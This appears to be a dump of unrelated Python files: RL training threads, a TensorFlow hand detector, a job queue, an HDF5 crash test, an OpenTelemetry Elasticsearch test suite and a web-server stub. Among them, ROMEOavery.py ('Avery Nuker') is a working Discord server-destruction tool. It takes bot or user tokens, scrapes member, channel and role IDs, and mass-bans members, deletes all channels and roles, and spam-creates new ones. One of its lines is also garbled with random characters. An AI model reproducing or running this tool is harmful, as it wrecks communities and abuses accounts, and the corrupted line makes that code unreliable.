alg_kwargs.pop('env_name')
alg_kwargs.pop('trained_path')
alg_kwargs.pop('transfer_path')
if transfer_path is not None:
# Do transfer learning
# learn(env=left_env, load_path=transfer_path, **alg_kwargs)
pass
else:
threads = []
print("starting threads")
for idx, leg in enumerate(legs):
alg_kwargs['seed'] = idx
threads.append(threading.Thread(target=learners[leg], kwargs=dict(env=leg_envs[leg], **alg_kwargs)))
for thread in threads:
thread.start()
# l_thread = threading.Thread(target=learn, kwargs=dict(env=left_env, **alg_kwargs))
# r_thread = threading.Thread(target=learn, kwargs=dict(env=right_env, **alg_kwargs))
# l_thread.start()
# r_thread.start()
print("threads started")
while True:
main_env.info.execute_action()
main_env.info.execute_reset()
time.sleep(1/1000)
|
ROMEOavery.py
|
import requests
import os
import sys
import threading
import time
import json
import asyncio
import discord
import aiohttp
from pypresence import Presence
from discord import Webhook, AsyncWebhookAdapter
from discord.ext import commands
os.system(f'cls & mode 85,20 & title [Avery Nuker] - Configuration')
token = input(f'\x1b[38;5;56m> \033[37mToken\x1b[38;5;56m: \033[37m')
rich_presence = input(f'\x1b[38;5;56m> \033[37mRich Presence (\x1b[38;5;56mY\033[37m/\x1b[38;5;56mN\033[37m)\x1b[38;5;56m: \033[37m')
os.system('cls')
def check_token():
if requests.get("https://discord.com/api/v8/users/@me", headers={"Authorization": f'{token}'}).status_code == 200:
return "user"
else:
return "bot"
def RichPresence():
if rich_presence == "y" or rich_presence == "Y":
try:
RPC = Presence("816053514584195073")
RPC.connect()
RPC.update(details="Connected", large_image="averylarge2", small_image="avery", large_text="github.com/skeqt/AveryNuker", start=time.time())
except:
pass
rich_presence = RichPresence()
token_type = check_token()
intents = discord.Intents.all()
intents.members = True
if token_type == "user":fvsevfradieq0 agtswFODMNV WOVWKDO0
headers = {'Authorization': f'{token}'}
client = commands.Bot(command_prefix=">", case_insensitive=False, self_bot=True, intents=intents)
elif token_type == "bot":
headers = {'Authorization': f'Bot {token}'}
client = commands.Bot(command_prefix=">", case_insensitive=False, intents=intents)
client.remove_command("help")
class Avery:
def __init__(self):
self.colour = '\x1b[38;5;56m'
def BanMembers(self, guild, member):
while True:
r = requests.put(f"https://discord.com/api/v8/guilds/{guild}/bans/{member}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Banned{self.colour} {member.strip()}\033[37m")
break
else:
break
def KickMembers(self, guild, member):
while True:
r = requests.delete(f"https://discord.com/api/v8/guilds/{guild}/members/{member}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Kicked{self.colour} {member.strip()}\033[37m")
break
else:
break
def DeleteChannels(self, guild, channel):
while True:
r = requests.delete(f"https://discord.com/api/v8/channels/{channel}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Deleted Channel {self.colour}{channel.strip()}\033[37m")
break
else:
break
def DeleteRoles(self, guild, role):
while True:
r = requests.delete(f"https://discord.com/api/v8/guilds/{guild}/roles/{role}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Deleted Role{self.colour} {role.strip()}\033[37m")
break
else:
break
def SpamChannels(self, guild, name):
while True:
json = {'name': name, 'type': 0}
r = requests.post(f'https://discord.com/api/v8/guilds/{guild}/channels', headers=headers, json=json)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Created Channel{self.colour} {name}\033[37m")
break
else:
break
def SpamRoles(self, guild, name):
while True:
json = {'name': name}
r = requests.post(f'https://discord.com/api/v8/guilds/{guild}/roles', headers=headers, json=json)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Created Role{self.colour} {name}\033[37m")
break
else:
break
async def Scrape(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
await client.wait_until_ready()
guildOBJ = client.get_guild(int(guild))
members = await guildOBJ.chunk()
try:
os.remove("Scraped/members.txt")
os.remove("Scraped/channels.txt")
os.remove("Scraped/roles.txt")
except:
pass
membercount = 0
with open('Scraped/members.txt', 'a') as m:
for member in members:
m.write(str(member.id) + "\n")
membercount += 1
print(f"\n{self.colour}[\033[37m!{self.colour}]\033[37m Scraped {self.colour}{membercount}\033[37m Members")
m.close()
channelcount = 0
with open('Scraped/channels.txt', 'a') as c:
for channel in guildOBJ.channels:
c.write(str(channel.id) + "\n")
channelcount += 1
print(f"{self.colour}[\033[37m!{self.colour}]\033[37m Scraped {self.colour}{channelcount}\033[37m Channels")
c.close()
rolecount = 0
with open('Scraped/roles.txt', 'a') as r:
for role in guildOBJ.roles:
r.write(str(role.id) + "\n")
rolecount += 1
print(f"{self.colour}[\033[37m!{self.colour}]\033[37m Scraped {self.colour}{rolecount}\033[37m Roles")
r.close()
async def NukeExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
channel_name = input(f"{self.colour}> \033[37mChannel Names{self.colour}: \033[37m")
channel_amount = input(f"{self.colour}> \033[37mChannel Amount{self.colour}: \033[37m")
role_name = input(f"{self.colour}> \033[37mRole Names{self.colour}: \033[37m")
role_amount = input(f"{self.colour}> \033[37mRole Amount{self.colour}: \033[37m")
print()
members = open('Scraped/members.txt')
channels = open('Scraped/channels.txt')
roles = open('Scraped/roles.txt')
for member in members:
threading.Thread(target=self.BanMembers, args=(guild, member,)).start()
for channel in channels:
threading.Thread(target=self.DeleteChannels, args=(guild, channel,)).start()
for role in roles:
threading.Thread(target=self.DeleteRoles, args=(guild, role,)).start()
for i in range(int(channel_amount)):
threading.Thread(target=self.SpamChannels, args=(guild, channel_name,)).start()
for i in range(int(role_amount)):
threading.Thread(target=self.SpamRoles, args=(guild, role_name,)).start()
members.close()
channels.close()
roles.close()
async def BanExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
print()
members = open('Scraped/members.txt')
for member in members:
threading.Thread(target=self.BanMembers, args=(guild, member,)).start()
members.close()
async def KickExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
print()
members = open('Scraped/members.txt')
for member in members:
threading.Thread(target=self.KickMembers, args=(guild, member,)).start()
members.close()
async def ChannelDeleteExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
print()
channels = open('Scraped/channels.txt')
for channel in channels:
threading.Thread(target=self.DeleteChannels, args=(guild, channel,)).start()
channels.close()
async def RoleDeleteExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
print()
roles = open('Scraped/roles.txt')
for role in roles:
threading.Thread(target=self.DeleteRoles, args=(guild, role,)).start()
roles.close()
async def ChannelSpamExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
name = input(f"{self.colour}> \033[37mChannel Names{self.colour}: \033[37m")
amount = input(f"{self.colour}> \033[37mAmount{self.colour}: \033[37m")
print()
for i in range(int(amount)):
threading.Thread(target=self.SpamChannels, args=(guild, name,)).start()
async def RoleSpamExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
name = input(f"{self.colour}> \033[37mRole Names{self.colour}: \033[37m")
amount = input(f"{self.colour}> \033[37mAmount{self.colour}: \033[37m")
print()
for i in range(int(amount)):
threading.Thread(target=self.SpamRoles, args=(guild, name,)).start()
async def PruneMembers(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
print()
await guild.prune_members(days=1, compute_prune_count=False, roles=guild.roles)
def Credits(self):
os.system(f'cls & mode 85,20 & title [Avery Nuker] - Credits')
print(f'''
{self.colour}╔═╗╦ ╦╔═╗╦═╗╦ ╦ ╔╗╔╦ ╦╦╔═╔═╗╦═╗
\033[90m╠═╣╚╗╔╝║╣ ╠╦╝╚╦╝ ║║║║ ║╠╩╗║╣ ╠╦╝
\033[37m╩ ╩ ╚╝ ╚═╝╩╚═ ╩ ╝╚╝╚═╝╩ ╩╚═╝╩╚═
{self.colour}[\033[37mDiscord{self.colour}] \033[37mskeet#1000
{self.colour}[\033[37mGithub{self.colour}] \033[37mskeqt
\033[37m''')
async def ThemeChanger(self):
os.system(f'cls & mode 85,20 & title [Avery Nuker] - Themes')
print(f'''
{self.colour}╔═╗╦ ╦╔═╗╦═╗╦ ╦ ╔╗╔╦ ╦╦╔═╔═╗╦═╗
\033[90m╠═╣╚╗╔╝║╣ ╠╦╝╚╦╝ ║║║║ ║╠╩╗║╣ ╠╦╝
\033[37m╩ ╩ ╚╝ ╚═╝╩╚═ ╩ ╝╚╝╚═╝╩ ╩╚═╝╩╚═
{self.colour}╔═══════════════════════╦═══════════════════════╦═══════════════════════╗\033[37m
{self.colour}║ \033[37m[{self.colour}1\033[37m] \033[37mRed {self.colour}║\033[37m [{self.colour}5\033[37m] \033[37mPurple {self.colour}║\033[37m [{self.colour}9\033[37m] \033[37mGrey {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}2\033[37m] \033[37mGreen {self.colour}║\033[37m [{self.colour}6\033[37m] \033[37mBlue {self.colour}║\033[37m [{self.colour}0\033[37m] \033[37mPeach {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}3\033[37m] \033[37mYellow {self.colour}║\033[37m [{self.colour}7\033[37m] \033[37mPink {self.colour}║\033[37m [{self.colour}M\033[37m] \033[37mMenu {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}4\033[37m] \033[37mOrange {self.colour}║\033[37m [{self.colour}8\033[37m] \033[37mCyan {self.colour}║\033[37m [{self.colour}X\033[37m] \033[37mExit {self.colour}║\033[37m
{self.colour}╚═══════════════════════╩═══════════════════════╩═══════════════════════╝\033[37m
\033[37m''')
choice = input(f'{self.colour}> \033[37mChoice{self.colour}: \033[37m')
if choice == '1':
self.colour = '\x1b[38;5;196m'
await self.ThemeChanger()
elif choice == '2':
self.colour = '\x1b[38;5;34m'
await self.ThemeChanger()
elif choice == '3':
self.colour = '\x1b[38;5;142m'
await self.ThemeChanger()
elif choice == '4':
self.colour = '\x1b[38;5;172m'
await self.ThemeChanger()
elif choice == '5':
self.colour = '\x1b[38;5;56m'
await self.ThemeChanger()
elif choice == '6':
self.colour = '\x1b[38;5;21m'
await self.ThemeChanger()
elif choice == '7':
self.colour = '\x1b[38;5;201m'
await self.ThemeChanger()
elif choice == '8':
self.colour = '\x1b[38;5;51m'
await self.ThemeChanger()
elif choice == '9':
self.colour = '\x1b[38;5;103m'
await self.ThemeChanger()
elif choice == '0':
self.colour = '\x1b[38;5;209m'
await self.ThemeChanger()
elif choice == 'M' or choice == 'm':
await self.Menu()
elif choice == 'X' or choice == 'x':
os._exit(0)
async def Menu(self):
os.system(f'cls & mode 85,20 & title [Avery Nuker] - Connected: {client.user}')
print(f'''
{self.colour}╔═╗╦ ╦╔═╗╦═╗╦ ╦ ╔╗╔╦ ╦╦╔═╔═╗╦═╗
\033[90m╠═╣╚╗╔╝║╣ ╠╦╝╚╦╝ ║║║║ ║╠╩╗║╣ ╠╦╝
\033[37m╩ ╩ ╚╝ ╚═╝╩╚═ ╩ ╝╚╝╚═╝╩ ╩╚═╝╩╚═
{self.colour}╔═══════════════════════╦═══════════════════════╦═══════════════════════╗\033[37m
{self.colour}║ \033[37m[{self.colour}1\033[37m] \033[37mBan Members {self.colour}║\033[37m [{self.colour}5\033[37m] \033[37mDelete Channels {self.colour}║\033[37m [{self.colour}9\033[37m] \033[37mScrape Info {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}2\033[37m] \033[37mKick Members {self.colour}║\033[37m [{self.colour}6\033[37m] \033[37mCreate Roles {self.colour}║\033[37m [{self.colour}0\033[37m] \033[37mChange Themes {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}3\033[37m] \033[37mPrune Members {self.colour}║\033[37m [{self.colour}7\033[37m] \033[37mCreate Channels {self.colour}║\033[37m [{self.colour}C\033[37m] \033[37mView Credits {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}4\033[37m] \033[37mDelete Roles {self.colour}║\033[37m [{self.colour}8\033[37m] \033[37mNuke Server {self.colour}║\033[37m [{self.colour}X\033[37m] \033[37mExit {self.colour}║\033[37m
{self.colour}╚═══════════════════════╩═══════════════════════╩═══════════════════════╝\033[37m
\033[37m''')
choice = input(f'{self.colour}> \033[37mChoice{self.colour}: \033[37m')
if choice == '1':
await self.BanExecute()
time.sleep(2)
await self.Menu()
elif choice == '2':
await self.KickExecute()
time.sleep(2)
await self.Menu()
elif choice == '3':
await PruneMembers()
time.sleep(2)
await self.Menu()
elif choice == '4':
await self.RoleDeleteExecute()
time.sleep(2)
await self.Menu()
elif choice == '5':
await self.ChannelDeleteExecute()
time.sleep(2)
await self.Menu()
elif choice == '6':
await self.RoleSpamExecute()
time.sleep(2)
await self.Menu()
elif choice == '7':
await self.ChannelSpamExecute()
time.sleep(2)
await self.Menu()
elif choice == '8':
await self.NukeExecute()
time.sleep(2)
await self.Menu()
elif choice == '9':
await self.Scrape()
time.sleep(3)
await self.Menu()
elif choice == '0':
await self.ThemeChanger()
elif choice == 'C' or choice == 'c':
self.Credits()
input()
await self.Menu()
elif choice == 'X' or choice == 'x':
os._exit(0)
@client.event
async def on_ready():
await Avery().Menu()
def Startup(self):
try:
if token_type == "user":
client.run(token, bot=False)
elif token_type == "bot":
client.run(token)
except:
print(f'{self.colour}> \033[37mInvalid Token')
input()
os._exit(0)
if __name__ == "__main__":
Avery().Startup()
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.20
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen inference graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.compat.v1.GraphDef()
with tf.compat.v2.io.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.compat.v1.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
print(scores[i])
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
def draw_names(name, image_np, x, y):
cv2.putText(image_np, name, (x, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.65, (100, 150, 200), 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
    # Define input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
    # Each score represents the level of confidence for each of the objects.
    # The score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
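# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative only): wires the threaded webcam reader
# to the detector helpers defined above.  Camera index 0, the 320x180 capture
# size, the two-hand limit and the 'q' quit key are assumptions made for the
# example, not requirements of these utilities.
if __name__ == '__main__':
    detection_graph, sess = load_inference_graph()
    stream = WebcamVideoStream(src=0, width=320, height=180).start()
    im_width, im_height = stream.size()
    try:
        while True:
            frame = stream.read()
            if frame is None:
                continue
            # The detector expects RGB input; OpenCV captures BGR frames.
            boxes, scores = detect_objects(
                cv2.cvtColor(frame, cv2.COLOR_BGR2RGB), detection_graph, sess)
            draw_box_on_image(2, _score_thresh, scores, boxes,
                              im_width, im_height, frame)
            cv2.imshow('Hand detection', frame)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
    finally:
        stream.stop()
        cv2.destroyAllWindows()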
|
ppequeue.py
|
from concurrent import futures
import queue
import threading
import time
class JobManager(object):
def __init__(self,jobs):
self.jobs=jobs
self.result=queue.Queue()
self.threads=[]
self.process_task_done=False
self.init_threads()
def init_threads(self):
t=threading.Thread(target=self.process_jobs)
self.threads.append(t)
for t in self.threads:
t.start()
def process_jobs(self):
def pull_job():
while not self.jobs.empty():
job=self.jobs.get()
yield job
executor=futures.ProcessPoolExecutor()
        fs=[executor.submit(do_something, job) for job in pull_job()]
for f in futures.as_completed(fs):
self.result.put(f.result())
self.process_task_done=True
def pull(self):
while True:
if self.process_task_done and self.result.empty():
break
res=self.result.get()
yield res
def do_something(i):
    print('do_something', i)
time.sleep(2)
return i
def main():
que=queue.Queue()
for i in range(30):
que.put(i)
job_manager=JobManager(que)
get=[]
for res in job_manager.pull():
print('get',res)
get.append(res)
print(sorted(get))
if __name__ == '__main__':
main()
|
verify.py
|
from sec2j import sec2j
from multiprocessing import Process, Queue
import os
import time
import numpy as np
import h5py
import sys
import random
def write_h5file(q):
# print 'Here'
fname = '/home/adaszews/mnt/mouse_brain/scratch/test.h5'
if os.path.exists(fname):
os.unlink(fname)
if os.path.exists(fname + '.journal'):
os.unlink(fname + '.journal')
f = sec2j.open(fname)
# print 'Here 2'
cnt = 0
while True:
try:
a = q.get(False)
            print('sec2j.set_exit()')
sec2j.set_exit(-1)
except:
pass
        print('*', end='')
sys.stdout.flush()
sec2j.tx_start(f.id.id)
g = f.require_group('dupa/%d' % cnt)
d = g.create_dataset('data', shape=(100, 100, 100), dtype=np.uint8)
d[:, :, :] = np.random.random([100, 100, 100])
cnt += 1
    print('Finishing')
sec2j.tx_end(f.id.id)
f.flush()
f.close()
def main():
    print('Testing different kill times')
n = 3
histo = [0] * n
for i in range(2, n):
        print('i:', i)
for k in range(0, 1):
q = Queue()
p = Process(target=write_h5file, args=(q,))
p.start()
# time.sleep(0.05 * i)
q.put(1)
p.join()
try:
f = h5py.File('test.h5', 'r')
f.close()
except:
                print('Broken')
histo[i] += 1
    print(histo)
if __name__ == '__main__':
main()
|
test_elasticsearch.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import threading
from ast import literal_eval
from unittest import mock
import elasticsearch
import elasticsearch.exceptions
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import opentelemetry.instrumentation.elasticsearch
from opentelemetry.instrumentation.elasticsearch import (
ElasticsearchInstrumentor,
)
from opentelemetry.test.test_base import TestBase
from opentelemetry.trace.status import StatusCode
major_version = elasticsearch.VERSION[0]
if major_version == 7:
from . import helpers_es7 as helpers # pylint: disable=no-name-in-module
elif major_version == 6:
from . import helpers_es6 as helpers # pylint: disable=no-name-in-module
elif major_version == 5:
from . import helpers_es5 as helpers # pylint: disable=no-name-in-module
else:
from . import helpers_es2 as helpers # pylint: disable=no-name-in-module
Article = helpers.Article
@mock.patch(
"elasticsearch.connection.http_urllib3.Urllib3HttpConnection.perform_request"
)
class TestElasticsearchIntegration(TestBase):
def setUp(self):
super().setUp()
self.tracer = self.tracer_provider.get_tracer(__name__)
ElasticsearchInstrumentor().instrument()
def tearDown(self):
super().tearDown()
with self.disable_logging():
ElasticsearchInstrumentor().uninstrument()
def get_ordered_finished_spans(self):
return sorted(
self.memory_exporter.get_finished_spans(),
key=lambda s: s.start_time,
)
def test_instrumentor(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
# Check version and name in span's instrumentation info
self.check_span_instrumentation_info(
span, opentelemetry.instrumentation.elasticsearch
)
# check that no spans are generated after uninstrument
ElasticsearchInstrumentor().uninstrument()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_span_not_recording(self, request_mock):
request_mock.return_value = (1, {}, {})
mock_tracer = mock.Mock()
mock_span = mock.Mock()
mock_span.is_recording.return_value = False
mock_tracer.start_span.return_value = mock_span
mock_tracer.use_span.return_value.__enter__ = mock_span
mock_tracer.use_span.return_value.__exit__ = mock_span
with mock.patch("opentelemetry.trace.get_tracer") as tracer:
tracer.return_value = mock_tracer
Elasticsearch()
self.assertFalse(mock_span.is_recording())
self.assertTrue(mock_span.is_recording.called)
self.assertFalse(mock_span.set_attribute.called)
self.assertFalse(mock_span.set_status.called)
ElasticsearchInstrumentor().uninstrument()
def test_prefix_arg(self, request_mock):
prefix = "prefix-from-env"
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor(span_name_prefix=prefix).instrument()
request_mock.return_value = (1, {}, {})
self._test_prefix(prefix)
def test_prefix_env(self, request_mock):
prefix = "prefix-from-args"
env_var = "OTEL_PYTHON_ELASTICSEARCH_NAME_PREFIX"
os.environ[env_var] = prefix
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor().instrument()
request_mock.return_value = (1, {}, {})
del os.environ[env_var]
self._test_prefix(prefix)
def _test_prefix(self, prefix):
es = Elasticsearch()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertTrue(span.name.startswith(prefix))
def test_result_values(self, request_mock):
request_mock.return_value = (
1,
{},
'{"found": false, "timed_out": true, "took": 7}',
)
es = Elasticsearch()
es.get(index="test-index", doc_type="tweet", id=1)
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
self.assertEqual("False", spans[0].attributes["elasticsearch.found"])
self.assertEqual(
"True", spans[0].attributes["elasticsearch.timed_out"]
)
self.assertEqual("7", spans[0].attributes["elasticsearch.took"])
def test_trace_error_unknown(self, request_mock):
exc = RuntimeError("custom error")
request_mock.side_effect = exc
self._test_trace_error(StatusCode.ERROR, exc)
def test_trace_error_not_found(self, request_mock):
msg = "record not found"
exc = elasticsearch.exceptions.NotFoundError(404, msg)
request_mock.return_value = (1, {}, {})
request_mock.side_effect = exc
self._test_trace_error(StatusCode.ERROR, exc)
def _test_trace_error(self, code, exc):
es = Elasticsearch()
try:
es.get(index="test-index", doc_type="tweet", id=1)
except Exception: # pylint: disable=broad-except
pass
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
span = spans[0]
self.assertFalse(span.status.is_ok)
self.assertEqual(span.status.status_code, code)
self.assertEqual(span.status.description, str(exc))
def test_parent(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
with self.tracer.start_as_current_span("parent"):
es.index(
index="sw", doc_type="people", id=1, body={"name": "adam"}
)
spans = self.get_ordered_finished_spans()
self.assertEqual(len(spans), 2)
self.assertEqual(spans[0].name, "parent")
self.assertEqual(spans[1].name, "Elasticsearch/sw/people/1")
self.assertIsNotNone(spans[1].parent)
self.assertEqual(spans[1].parent.span_id, spans[0].context.span_id)
def test_multithread(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
ev = threading.Event()
# 1. Start tracing from thread-1; make thread-2 wait
# 2. Trace something from thread-2, make thread-1 join before finishing.
# 3. Check the spans got different parents, and are in the expected order.
def target1(parent_span):
with self.tracer.use_span(parent_span):
es.get(index="test-index", doc_type="tweet", id=1)
ev.set()
ev.wait()
def target2():
ev.wait()
es.get(index="test-index", doc_type="tweet", id=2)
ev.set()
with self.tracer.start_as_current_span("parent") as span:
t1 = threading.Thread(target=target1, args=(span,))
t1.start()
t2 = threading.Thread(target=target2)
t2.start()
t1.join()
t2.join()
spans = self.get_ordered_finished_spans()
self.assertEqual(3, len(spans))
s1, s2, s3 = spans
self.assertEqual(s1.name, "parent")
self.assertEqual(s2.name, "Elasticsearch/test-index/tweet/1")
self.assertIsNotNone(s2.parent)
self.assertEqual(s2.parent.span_id, s1.context.span_id)
self.assertEqual(s3.name, "Elasticsearch/test-index/tweet/2")
self.assertIsNone(s3.parent)
def test_dsl_search(self, request_mock):
request_mock.return_value = (1, {}, '{"hits": {"hits": []}}')
client = Elasticsearch()
search = Search(using=client, index="test-index").filter(
"term", author="testing"
)
search.execute()
spans = self.get_ordered_finished_spans()
span = spans[0]
self.assertEqual(1, len(spans))
self.assertEqual(span.name, "Elasticsearch/test-index/_search")
self.assertIsNotNone(span.end_time)
self.assertEqual(
span.attributes,
{
"db.system": "elasticsearch",
"elasticsearch.url": "/test-index/_search",
"elasticsearch.method": helpers.dsl_search_method,
"db.statement": str(
{
"query": {
"bool": {
"filter": [{"term": {"author": "testing"}}]
}
}
}
),
},
)
def test_dsl_create(self, request_mock):
request_mock.return_value = (1, {}, {})
client = Elasticsearch()
Article.init(using=client)
spans = self.get_ordered_finished_spans()
self.assertEqual(2, len(spans))
span1, span2 = spans
self.assertEqual(span1.name, "Elasticsearch/test-index")
self.assertEqual(
span1.attributes,
{
"db.system": "elasticsearch",
"elasticsearch.url": "/test-index",
"elasticsearch.method": "HEAD",
},
)
self.assertEqual(span2.name, "Elasticsearch/test-index")
attributes = {
"db.system": "elasticsearch",
"elasticsearch.url": "/test-index",
"elasticsearch.method": "PUT",
}
self.assert_span_has_attributes(span2, attributes)
self.assertEqual(
literal_eval(span2.attributes["db.statement"]),
helpers.dsl_create_statement,
)
def test_dsl_index(self, request_mock):
request_mock.return_value = helpers.dsl_index_result
client = Elasticsearch()
article = Article(
meta={"id": 2},
title="About searching",
body="A few words here, a few words there",
)
res = article.save(using=client)
self.assertTrue(res)
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
span = spans[0]
self.assertEqual(span.name, helpers.dsl_index_span_name)
attributes = {
"db.system": "elasticsearch",
"elasticsearch.url": helpers.dsl_index_url,
"elasticsearch.method": "PUT",
}
self.assert_span_has_attributes(span, attributes)
self.assertEqual(
literal_eval(span.attributes["db.statement"]),
{
"body": "A few words here, a few words there",
"title": "About searching",
},
)
|
webserve.py
|
import sys
import os
import base64
import threading
import ssl
import socketserver
#import BaseHTTPServer
#from SimpleHTTPServer import SimpleHTTPRequestHandler
from http.server import SimpleHTTPRequestHandler
from importlib import reload
WEB_PORT=5000
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def log_request(self, *args, **kwargs):
pass
class WebHandler(SimpleHTTPRequestHandler):
def do_GET(self):
import webhandle
reload(webhandle)
webhandle.do_get(self)
def do_POST(self):
import webhandle
reload(webhandle)
webhandle.do_post(self)
SERVER=None
